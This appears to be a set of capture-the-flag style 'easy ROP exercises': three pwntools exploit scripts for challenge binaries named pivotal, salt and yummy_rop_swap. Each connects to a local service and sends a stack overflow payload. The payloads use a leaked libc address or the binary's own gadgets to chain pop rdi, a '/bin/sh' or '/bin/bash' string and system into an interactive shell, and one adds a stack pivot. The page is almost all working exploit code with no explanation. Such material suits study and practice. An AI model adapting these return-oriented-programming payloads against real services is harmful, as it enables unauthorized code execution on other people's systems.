Easy ROP exercises

pivotal.elf

pivotal.py

from pwn import *

offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd17
offset_printf = 0x0000000000055800

s = remote("127.0.0.1", 5000)
raw_input()
s.recvuntil("random number: ")
x = s.recvline().strip()
printf_leak = int(x, 16)
libc_base = printf_leak - offset_printf
success(hex(libc_base))

s.recvuntil("> ")
payload_1 = "A"*8
payload_1 += p64(0x0000000000400723) # 0x0000000000400723 : pop rdi ; ret
payload_1 += p64(libc_base + offset_str_bin_sh)
payload_1 += p64(libc_base + offset_system)
s.sendline(payload_1)

s.recvuntil("> ")
payload_2 = "B"*40
payload_2 += p64(0x4005f6) # 0x4005f6 <debug+16>    sub    rsp, 0xa8
s.sendline(payload_2)

s.interactive()

salt.elf

salt.py

from pwn import *

offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd17
offset_puts = 0x000000000006f690

s = remote("127.0.0.1", 5000)
raw_input()
s.recvuntil("It's dangerous to go alone! Take this, ")
x = s.recvline().strip()
puts_leak = int(x, 16)
libc_base = puts_leak - offset_puts
success(hex(libc_base))
payload = "A"*1352
payload += p64(0x0000000000400713) # 0x0000000000400713 : pop rdi ; ret
payload += p64(libc_base+offset_str_bin_sh)
payload += p64(libc_base+offset_system)

s.recvuntil(": ")
s.sendline(payload)
s.interactive()

yummy_rop_swap.elf

yummy_rop_swap.py

from pwn import *

payload = "A"*136
payload += p64(0x0000000000400713)# 0x0000000000400713 : pop rdi ; ret
payload += p64(0x0000000000400738)# 0x0000000000400738 : db '/bin/bash',0
payload += p64(0x000000000040064F)# 0x000000000040064F : call    _system

s = remote("127.0.0.1", 5000)
s.sendline(payload)
s.interactive()